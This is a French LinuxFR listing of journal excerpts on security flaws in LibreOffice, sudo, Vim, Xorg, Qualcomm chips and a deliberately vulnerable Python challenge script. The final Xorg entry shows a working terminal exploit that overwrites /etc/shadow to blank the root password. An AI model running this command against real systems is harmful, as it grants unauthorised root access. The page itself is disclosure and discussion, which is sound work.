Journal LibreOffice : faille de sécurité liée aux fichiers MSOffice corrigée

17
19
mai
2020

Salut les gens,

une faille de sécurité a été corrigée dans toutes les versions de LibreOffice antérieures à la 6.3.6 pour la branche 6.3 et 6.4.3 pour la branche 6.4.

Cette faille concerne le traitement des fichiers MSOffice protégés par mot de passe en cas de plantage de LibreOffice.

Si vous voulez en savoir plus sur cette faille, gentiment nommée CVE-2020-12801, c'est par ici et en anglais.

On vous conseille le traitement habituel, choloroq, mise à jour de (…)

Journal sudo, faille pwfeedback

Posté par  . Licence CC By‑SA.
Étiquettes :
22
1
fév.
2020

Une nouvelle version de sudo est sortie. Elle corrige une faille assez sévère.

L'option pwfeedback est une option qui offre un retour visuel lors de la saisie du mot de passe, en affichant des étoiles. Le bogue entraîne un dépassement de tampon, notamment lorsqu’un utilisateur, même non enregistré, tape ^U (effacer la ligne) sur un longue chaîne.
Cette option est désormais ignorée dans un environnement hors TTY, propice à ce comportement. Elle est toutefois rarement activée par défaut.

Cette (…)

Journal Chaînes de formatage et sécurité en python (solution au "Petit Défi Python")

Posté par  (site web personnel) . Licence CC By‑SA.
46
22
jan.
2020

La semaine dernière, je vous proposais un défi de cybersécurité en python. Si vous ne l'avez pas encore vu, allez tenter votre chance sur Github avant de lire la suite de ce journal, ce sera plus intéressant.

La vulnérabilité

La première étape du défi était de trouver où était la faille de sécurité. L'application étant toute simple, ce n'était pas très difficile. Le script python contient les deux lignes suivantes:

to_format = f"Printing a {self.width}-character wide box: [Age:
(…)

Journal Petit défi Python

Posté par  (site web personnel) . Licence CC By‑SA.
28
14
jan.
2020

Aujourd’hui, je propose à ceux qui s’ennuient un petit défi de cybersécurité en Python.
Voici un script Python qui semble trivial, et qui contient une faille de sécurité :

#!/usr/bin/env python3
import random

SECRET = ''.join(random.choice("0123456789") for i in range(64))

class Sandbox:

    def ask_age(self):
        self.age = input("How old are you ? ")
        self.width = input("How
(…)

Journal Linux Mint, Mate et grosse faille foireuse au niveau du verrouillage d´écran

Posté par  (Mastodon) . Licence CC By‑SA.
13
30
sept.
2019

J'ai trouvé ça tellement énorme que je vais vous relater l'aventure.

Un collègue a un laptop sous Linux Mint (ubuntu based il me semble) avec le bureau Mate. Aucune idée du desktop Manager. Tout à l'heure ont s´était posé ensemble dans une salle pour bosser sur un sujet commun [1]. On termine, il rabat l´écran de son laptop, qui vérouille la session, jusque là tout va bien. Arrivé à sa place de travail il redéploie l´écran, voit la mire l'invitant (…)

Journal [FAILLE] Code execution dans Vim via un fichier malicieux forgé

Posté par  . Licence CC By‑SA.
29
11
juin
2019

La vulnérabilité est tombée hier:

https://github.com/numirias/security/blob/master/doc/2019-06-04_ace-vim-neovim.md

Il s'agit d'execution de code, possiblement distante (merci netcat) en exploitant une //faille// dans la gestion des modeline (Fonctionnalité qui permet de configurer vim pour le buffer courant, via une ligne spécialement formaté au début du fichier)

L'astuce intéressante est que, par l'utilisation de caractères d'échappement, l'attaquant peut même rendre la ligne malicieuse invisible via cat.

Des mitigations existent (désactiver les modelines), tout est détaillé sur la page.

Journal Réflexion d'un utilisateur de Firefox avec un processeur Intel en 2019

Posté par  (site web personnel) . Licence CC By‑SA.
23
25
mai
2019

Bonjour nal,

Je ne peux m'empêcher de mettre en parallèle les gains ahurissants de performance de Firefox depuis un an (cf la dernière dépêche en date) avec la dégradation tout aussi ahurissante des performances Intel depuis un an.

Tandis que les développements du premier sont entièrement tendus vers les moyens d'accroître la vitesse et la réactivité du logiciel (en même temps que sa sécurité et de proposer des outils de défense de la vie privée aux utilisateurs) (…)

Journal Qualcomm corrige une faille critique dans des dizaines de puces Snapdragon

24
8
mai
2019

Pour continuer sur les discussions autour d'Android du moment sur LinuxFR.

Source : https://app.beebom.com/qualcomm-patches-critical-flaw-dozens-snapdragon-socs/

Traduction :

Des chercheurs du groupe NCC, une compagnie spécialisée dans la cybersécurité, ont découvert une vulnérabilité critique qui affecte des dizaines de puces Qualcomm utilisés dans les téléphones et tablettes Android.

D’après les rapports, pas moins de 46 puces Qualcomm, incluant les SD820, 835, 845, 855, 625, 636, 660, 670 sont probablement impactés par la vulnérabilité qui permet d’autoriser des attaquants potentiels à accéder à (…)

Journal La faille grosse comme une maison

Posté par  (Mastodon) . Licence CC By‑SA.
Étiquettes :
28
26
oct.
2018

[Dev@localhost ~]$ id

uid=1000(Dev) gid=1000(Dev) groups=1000(Dev) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023

[Dev@localhost ~]$
[Dev@localhost ~]$ cd /etc
[Dev@localhost etc]$
[Dev@localhost etc]$ ls -la shadow

----------. 1 root root 1241 Oct 10 01:15 shadow

[Dev@localhost etc]$
[Dev@localhost etc]$ cat shadow

cat: shadow: Permission denied

[Dev@localhost etc]$
[Dev@localhost etc]$ Xorg -fp "root::16431:0:99999:7:::" -logfile shadow :1

X.Org X Server 1.19.5
Release Date: 2017-10-12
X Protocol Version 11, Revision 0
Build Operating System: 3.10.0-693.17.1.el7.x86_64
Current Operating System: Linux localhost.localdomain 3.10.0-862.14.4.el7.x86_64 #1 SMP Wed Sep 26 15:12:11 UTC 2018 (…)